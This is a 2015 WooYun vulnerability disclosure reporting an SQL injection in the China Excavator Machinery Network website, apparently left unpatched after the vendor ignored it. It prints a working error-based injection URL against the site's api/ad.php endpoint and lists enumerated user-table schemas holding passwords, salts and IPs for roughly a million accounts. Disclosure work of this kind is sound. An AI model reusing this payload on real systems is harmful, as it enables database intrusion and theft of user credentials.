当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146462

漏洞标题:中国挖掘机械网SQL注入(涉及约100万条用户数据)

相关厂商:中国挖掘机械网

漏洞作者: 渔村安全实验室

提交时间:2015-10-14 09:34

修复时间:2015-11-28 09:36

公开时间:2015-11-28 09:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

中国挖掘机械网(www.cema.org.cn)是目前国内挖掘机行业最大、最专业的互联网企业。自其创立以来始终秉承“以资讯创造价值”的理 念,通过资源互补的方式,与全国各地近百家挖掘机专业制造企业,国内、外与挖掘机配套的零部件供应商,全国近千家各种品牌挖掘机销售代理商密切合作,力求 通过我们的服务,使挖掘机生产企业、流通渠道、以及施工用户能够准确、迅捷地获得更大范围的信息资源、最大程度地降低运营成本,从而在激烈的市场竞争中更 加轻松地创造并把握机遇。

http://www.cema.org.cn/api/ad.php?id=16%00' AND ROW(3164,4253)>(SELECT COUNT(*),CONCAT(0x70614b41,(SELECT (ELT(3164=3164,1))),0x57467963,FLOOR(RAND(0)*2))x FROM (SELECT 1980 UNION SELECT 2708 UNION SELECT 1445 UNION SELECT 2196)a GROUP BY x)  AND 'cdEB'='cdEB


QQ截图20151013154251.png


QQ截图20151013154635.png


DB_NUM:2	Table_Num:362	Data:6476861


大约约100W条账号记录

cdb_common_member
	511451
		uid
		email
		username
		password
		status
		emailstatus
		avatarstatus
		videophotostatus
		adminid
		groupid
		groupexpiry
		extgroupids
		regdate
		credits
		notifysound
		timeoffset
		newpm
		newprompt
		accessmasks
		allowadmincp
		onlyacceptfriendpm
		conisbind
	cdb_ucenter_members
	511552
		uid
		username
		password
		email
		myid
		myidkey
		regip
		regdate
		lastloginip
		lastlogintime
		salt
		secques


QQ截图20151013154904.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 渔村安全实验室@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)